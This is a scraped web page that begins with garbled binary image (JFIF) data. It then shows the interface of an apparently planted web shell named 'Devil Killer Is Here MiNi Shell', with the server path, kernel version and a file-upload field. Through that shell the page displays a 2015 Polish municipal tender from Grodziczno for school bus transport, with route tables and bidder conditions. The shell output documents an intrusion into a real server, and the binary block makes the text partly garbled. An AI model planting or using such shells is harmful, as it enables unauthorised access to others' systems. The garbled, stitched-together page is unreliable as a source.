JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150622/150480-N-2015.html

<p class="kh_header"><b>Grodziczno: Świadczenie usług transportowych uczniów</b><br>
<b>Numer ogłoszenia: 150480 - 2015; data zamieszczenia: 22.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodziczno , Grodziczno 17A, 13-324 Grodziczno, woj. warmińsko-mazurskie, tel. 056 4729126, faks 056 4729106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grodziczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportowych uczniów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych uczniów. 
2.	Usługi transportowe uczniów dotyczą dowozu i odwozu uczniów uczęszczających do gimnazjów i szkół podstawowych na terenie Gminy Grodziczno oraz przewozu dzieci i młodzieży szkolnej nie związanego z dowozem na zajęcia szkolne.
3.	Przedmiot zamówienia został podzielony na 6 części i obejmuje szczegółowy wykaz tras transportu, minimalną ilość miejsc siedzących, liczbę uczniów dowożonych i odwożonych na poszczególnych trasach, ilość kilometrów na trasie.
4.	W częściach nr 1, nr 2, nr 3, nr 4, nr 5 w liczonym limicie kilometrów nie jest liczony dojazd i odjazd środka transportu do miejsca wykonywania usługi. Koszt ten jest kosztem Wykonawcy. 
5.	W częściach nr 6 Wykonawca rozliczany będzie z miejsca wyjazdu i powrotu wyznaczonego przez Zamawiającego. 
6.	Miejsca siedzące to liczba miejsc na jaką zarejestrowany jest pojazd bez miejsc stojących.
7.	W poszczególnych częściach przedmiotu zamówienia obsługiwać będzie jeden pojazd z uwagi na przesunięcia czasowe.
8.	Wykonawca zobowiązany jest do punktualnego dowozu i odwozu uczniów. Wszyscy uczniowie dowiezieni do szkoły muszą być odwiezieni po zakończonych zajęciach.
9.	Wykonawca zobowiązany jest do zapewnienia bezpieczeństwa przewożonym dzieciom i młodzieży szkolnej.
10.	Wykonawca zobowiązany jest do zapewnienia zastępczego środka transportowego w razie awarii pojazdu lub innych przyczyn, którym dokonywany jest transport. Zastępczy środek transportowy musi spełniał warunki dla danej części przedmiotu zamówienia określone w niniejszej SIWZ. 
11.	Wykonawca zobowiązany jest  aby kierowca  posiadał uprawnienia do kierowania pojazdem, którym świadczona będzie usługa. 
12.	Wykonawca zobowiązany jest aby opiekun (osoba opiekująca się uczniami) posiadał kwalifikacje pedagogiczne i przeszkolenie z zakresu pierwszej pomocy przedmedycznej.
13.	Realizacja części nr 1, nr 2, nr 3, nr 4, nr 5 przedmiotu zamówienia odbywać będzie się we wszystkie dni, w których będą odbywać się zajęcia szkolne. Realizacja części nr 6 przedmiotu zamówienia odbywać się będzie według potrzeb na zlecenie Zamawiającego. 
14.	Czas dowozu i odwozu wg tras w części nr 1, części nr 2, części nr 3, części nr 4 i część nr 5  przedmiotu zamówienia będzie podany Wykonawcy, z którym podpisze Zamawiający umowę na realizację usługi, do dnia 31 sierpnia 2015 roku tj. przed rozpoczęciem roku szkolnego. Czas dowozu i odwozu według tras będzie dostosowany do realizowanych zajęć edukacyjnych i może ulec zmianie.
15.	Zamawiający wymaga dokumentowania przejechanych kilometrów. Wykazana ilość kilometrów w rachunku/fakturze nie może przekroczyć ilości kilometrów na danej trasie wykazanej do niniejszego postepowania. Do każdego rachunku/faktury za zrealizowaną usługę musi być dołączone zestawienie potwierdzone przez osobę upoważnioną przez Zamawiającego zgodne z zał. nr 9 do SIWZ.
16. Szczegółowy wykaz tras dotyczący świadczenia usług transportowych, minimalna ilość miejsc siedzących, które musi mieć pojazd a także liczba dzieci i młodzieży dowożona i odwożona na poszczególnych trasach realizowanego przedmiotu zamówienia przedstawia się następująco:
1) Część nr 1 przedmiotu zamówienia: 
Świadczenie usług transportowych uczniów (Zespół Szkół w Nowym Grodzicznie, Szkoła Podstawowa w Zajączkowie). Środek transportu  - minimum 50 miejsc siedzących. 

TRASA I

Dowóz

Dowóz [przebieg trasy poniedziałek, środa, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kuligi		
Zajączkowo wieś		
Zajączkowo pod Jakubkowo		
Zajączkowo wieś		
Wólka		
Mortęgi		
Wólka		
Linowiec 		
Nowe Grodziczno szkoła		
RAZEM	37	16,90
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec wieś		
Linowiec wiadukt		
Nowe Grodziczno szkoła		
RAZEM	41	7,80
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki młyn		
Nowe Grodziczno szkoła		
RAZEM	7	5,30
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Wólka		
Mortęgi		
Wólka		
Zajączkowo szkoła		
RAZEM	50	12,40

Odwóz

Odwóz [przebieg trasy poniedziałek, środa, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec wiadukt	
Linowiec wieś	
Wólka	
Mortęgi	
Wólka	
Zajączkowo	
Kuligi	
Zajączkowo	
RAZEM	18,10
Odwóz [przebieg trasy poniedziałek, środa, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki młyn	
Nowe Grodziczno szkoła	
RAZEM	5,30
Odwóz [przebieg trasy poniedziałek, środa, piątek]
	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec 	
Wólka	
Mortęgi	
Wólka	
Zajączkowo wieś	
Zajączkowo pod Jakubkowo	
Zajączkowo wieś	
Kuligi	
RAZEM	16,90
Odwóz [przebieg trasy poniedziałek, wtorek, środa]	Ilość km na trasie
Zajączkowo	
Wólka	
Mortęgi	
Wólka	
Nowe Grodziczno szkoła	
RAZEM	12,40
Odwóz [przebieg trasy poniedziałek, wtorek, środa]	Ilość km na trasie
Zajączkowo	
Wólka	
Mortęgi	
Wólka	
Nowe Grodziczno szkoła	
RAZEM	12,40
Odwóz [przebieg trasy wtorek, środa]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki	
Rynek	
Ostaszewo	
Katlewo	
Białobłoty	
Zwiniarz	
Świniarc	
Tuszewo	
Montowo	
Grodziczno	
Linowiec	
Wólka	
Zajączkowo	
Kuligi	
RAZEM	43,10

TRASA II

Dowóz

Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kuligi		
Zajączkowo wieś		
Zajączkowo pod Jakubkowo		
Zajączkowo wieś		
Wólka		
Mortęgi		
Wólka		
Linowiec 		
Nowe Grodziczno szkoła		
RAZEM	39	16,90
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec wieś		
Linowiec wiadukt		
Nowe Grodziczno szkoła		
RAZEM	36	7,80
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki młyn		
Nowe Grodziczno szkoła		
RAZEM	7	5,30
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Wólka		
Mortęgi		
Wólka		
Zajączkowo szkoła		
RAZEM	50	12,40

Odwóz

Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec wiadukt	
Linowiec wieś	
Wólka	
Mortęgi	
Wólka	
Zajączkowo	
Kuligi	
Zajączkowo	
RAZEM	18,10
Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki młyn	
Nowe Grodziczno szkoła	
RAZEM	5,30
Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Wólka	
Zajączkowo wieś	
Zajączkowo pod Jakubkowo	
Zajączkowo wieś	
Kuligi	
RAZEM	16,90
Odwóz [przebieg trasy czwartek, piątek]	Ilość km na trasie
Zajączkowo	
Wólka	
Mortęgi	
Wólka	
Nowe Grodziczno szkoła	
RAZEM	12,40

2) Część nr 2 przedmiotu zamówienia: 
Świadczenie usług transportowych uczniów  (Zespół Szkół w Nowym Grodzicznie, Szkoła Podstawowa w Montowie). Środek transportu  - minimum 59  miejsc siedzących. 

TRASA I

Dowóz

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Rynek przystanek PKS		
Rynek szkoła		
Rynek skrzyżowanie		
Rynek pod Kiełpiny		
Ostaszewo Jacuński		
Ostaszewo Dom Nauczyciela		
Ostaszewo Sklep		
Ostaszewo Rubalewski		
Katlewo wieś		
Katlewo skrzyżowanie		
Grodziczno Firański		
Nowe Grodziczno szkoła		
RAZEM	59	14,60
Dowóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki skrzyżowanie		
Lorki wieś		
Nowe Grodziczno Góralski		
Nowe Grodziczno szkoła		
RAZEM	31	10,50
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Katlewo wieś		
Katlewo Lewandowski		
Katlewo skrzyżowanie 		
Montowo dworzec PKP		
Montowo szkoła		
RAZEM	24	8,80
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Montowo szkoła		
(droga żwirówka) Linowiec Karbowski		
Linowiec Seweryn		
Montowo figura		
Montowo szkoła		
RAZEM	17	10,00
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Nowe Grodziczno Góralski	
Lorki wieś	
Lorki skrzyżowanie I	
Lorki skrzyżowanie II	
Rynek przystanek PKS	
Rynek szkoła	
Rynek skrzyżowanie	
Rynek pod Kiełpiny	
Ostaszewo Jacuński	
Ostaszewo Dom Nauczyciela	
Ostaszewo Sklep	
Ostaszewo Rubalewski	
Katlewo wieś	
Katlewo skrzyżowanie	
RAZEM	2160
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Montowo szkoła	
(droga żwirówka) Linowiec Karbowski	
Linowiec Seweryn	
Montowo figura	
Montowo dworzec PKP	
Katlewo wieś	
RAZEM	11,70
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Nowe Grodziczno Góralski	
Lorki wieś	
Lorki skrzyżowanie I	
Lorki skrzyżowanie II	
Rynek przystanek PKS	
Rynek szkoła	
Rynek skrzyżowanie	
Ostaszewo Jacuński	
Ostaszewo Dom Nauczyciela	
Ostaszewo Sklep	
Ostaszewo Rubalewski	
Katlewo wieś	
Katlewo skrzyżowanie	
RAZEM	20,10
Odwóz [przebieg trasy poniedziałek, , środa, piątek]	Ilość km na trasie
Montowo szkoła	
(droga żwirówka) Linowiec Karbowski	
Linowiec Seweryn	
Montowo figura	
Montowo dworzec PKP	
Katlewo wieś	
RAZEM	11,70
3)	Część nr 3 przedmiotu zamówienia: 
Świadczenie usług transportowych uczniów (Zespół Szkół w Mrocznie). Środek transportu  - minimum 36  miejsc siedzących. 
TRASA I

Dowóz

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Mroczno szkoła		
Mroczno góry		
Mroczenko koło Dudulskiego		
Mroczenko koło jeziora		
Mroczno szkoła		
RAZEM	29	18,20
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Mroczenko PKS wieś		
Mroczno szkoła		
RAZEM	27	5,00

Odwóz 

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20
Odwóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20
Odwóz [przebieg trasy  środa]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20

TRASA II

Dowóz

Dowóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Sugajenko wieś		
Sugajenko koło Romanowskich		
Sugajenko koło Miąskowskich		
Wybudowanie pod Sugajno		
Mroczno		
Mroczno szkoła		
RAZEM	36	13,00

Odwóz

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno	
Wybudowanie pod Sugajno	
Sugajenko koło Miąskowskich	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	13,00
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło krzyża	
Sugajenko koło Miąskowskich	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	10,50
Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Mroczno	
Wybudowanie pod Sugajno	
Sugajenko koło Miąskowskich	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	13,00

4)	Część nr 4 przedmiotu zamówienia: 
Świadczenie usług transportowych uczniów (Zespół Szkół w Mrocznie). Środek transportu  - minimum 32 miejsca siedzące. 

TRASA I

Dowóz

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kowaliki PKS		
Boleszyn		
Mroczno szkoła		
RAZEM	22	10,40

Odwóz

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Boleszyn	
Kowaliki PKS	
RAZEM	10,40
Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Boleszyn	
Kowaliki PKS	
RAZEM	10,40

TRASA II

Dowóz

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Trzcin		
Trzcin koło mostu		
Mroczno koło Sendwickiego		
Mroczno szkoła		
RAZEM	32	10,00

Odwóz

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00
Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00

5)	Część nr 5 przedmiotu zamówienia
Świadczenie usług transportowych uczniów (Zespół Szkół w Nowym Grodzicznie, Szkoła Podstawowa w Zwiniarzu). Środek transportu  - minimum 52 miejsca siedzące. 

TRASA I

Dowóz

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Świniarc Klejn		
Świniarc wieś przystanek PKS		
Zwiniarz wieś przystanek PKS		
Białobłoty Kościński		
Białobłoty Szczepański		
Białobłoty przepompownia		
Montowo sklep		
Nowe Grodziczno szkoła		
RAZEM	52	11,40
Dowóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Białobłoty przepompownia		
Białobłoty Szczepański		
Białobłoty Kościński		
Świniarc wieś przystanek PKS		
Zwiniarz szkoła 		
RAZEM	39	13,60

Odwóz

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Montowo sklep	
Świniarc Klejn	
Świniarc wieś przystanek PKS	
Zwiniarz wieś przystanek PKS	
Białobłoty Kościński	
Białobłoty Szczepański	
Białobłoty przepompownia	
Zwiniarz szkoła	
RAZEM	17,70
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Zwiniarz szkoła	
Świniarc wieś przystanek PKS	
Białobłoty Kościński	
Białobłoty Szczepański	
Białobłoty przepompownia	
Nowe Grodziczno szkoła	
RAZEM	13,60
Odwóz [przebieg trasy poniedziałek, wtorek, środa]	Ilość km na trasie
Zwiniarz szkoła	
Świniarc wieś przystanek PKS	
Białobłoty Kościński	
Białobłoty Szczepański	
Białobłoty przepompownia	
Nowe Grodziczno szkoła	
RAZEM	13,60
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Montowo sklep	
Białobłoty przepompownia	
Białobłoty Szczepański	
Białobłoty Kościński	
Zwiniarz wieś przystanek PKS	
Świniarc wieś przystanek PKS	
Świniarc Klejn	
RAZEM	11,40

6)	Część nr 6 przedmiotu zamówienia 
Świadczenie usług transportowych uczniów (Przewóz dzieci i młodzieży szkolnej nie związany z dowozem na zajęcia szkolne). Środek transportu  - minimum 40 miejsc siedzących. 
Trasa transportu będzie zlecana każdorazowo według potrzeb Zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności powodujących, że wykonanie zamówienia będzie niemożliwe do wykonania zgodnie z ustalonymi trasami i kilometrami,
2. z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia, proponowanych przez jedną ze stron - jeżeli zmiany te są korzystne dla Zamawiającego,
3. zmian ilościowych dzieci skutkujących zmianami w ilości dowożonych uczniów,
zmian uzależnionych od zmiany planów lekcji, ilości dzieci, zmiany organizacji roku szkolonego, odpracowywania dni wolnych, skrócenia godzin nauki etc.
4. konieczności likwidacji, skrócenia lub wydłużenia każdej z tras w poszczególnych częściach przedmiotu zamówienia spowodowanej zmianami ilościowymi dowożonych uczniów,
5. konieczności wprowadzenia dodatkowych przystanków na każdej z tras w poszczególnych częściach przedmiotu zamówienia spowodowanej zmianami ilościowymi dowożonych uczniów.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie licencji na wykonanie krajowego transportu drogowego osób  zgodnie  z ustawą  z  dnia  06.09.2001 roku o transporcie drogowym (Dz. U. z  2013 r. poz. 1414 z późniejszymi zmianami) ważną na cały okres realizacji przedmiotu zamówienia. 
Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie wykazu niezbędnego do wykonania zamówienia taboru komunikacyjnego w ilości co najmniej 1 szt. z podaniem rodzaju i marki pojazdu, numeru rejestracyjnego pojazdu, ilości miejsc siedzących w pojeździe, właściciela pojazdu oraz daty ważności przeglądu technicznego pojazdu, którym dysponuje lub będzie dysponował Wykonawca.  Przegląd techniczny pojazdu musi być ważny na dzień składania oferty.
Dla oferty częściowej pojazd musi mieć minimum miejsc siedzących (miejsca siedzące to liczba miejsc na jaką zarejestrowany jest pojazd bez miejsc stojących):
nr 1 - 50 miejsc siedzących, nr 2 - 59 miejsc siedzących, nr 3 - 36 miejsc siedzących, nr 4 - 32 miejsc siedzących, nr 5 - 52 miejsc siedzących, nr 6 - 40 miejsc siedzących. 
Wykazanym potencjałem technicznym wykonawca musi świadczyć usługi w ramach przedmiotowego zamówienia publicznego. 
Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Kierowca musi posiadać uprawnienia do kierowania pojazdem, którym świadczona jest usługa. 
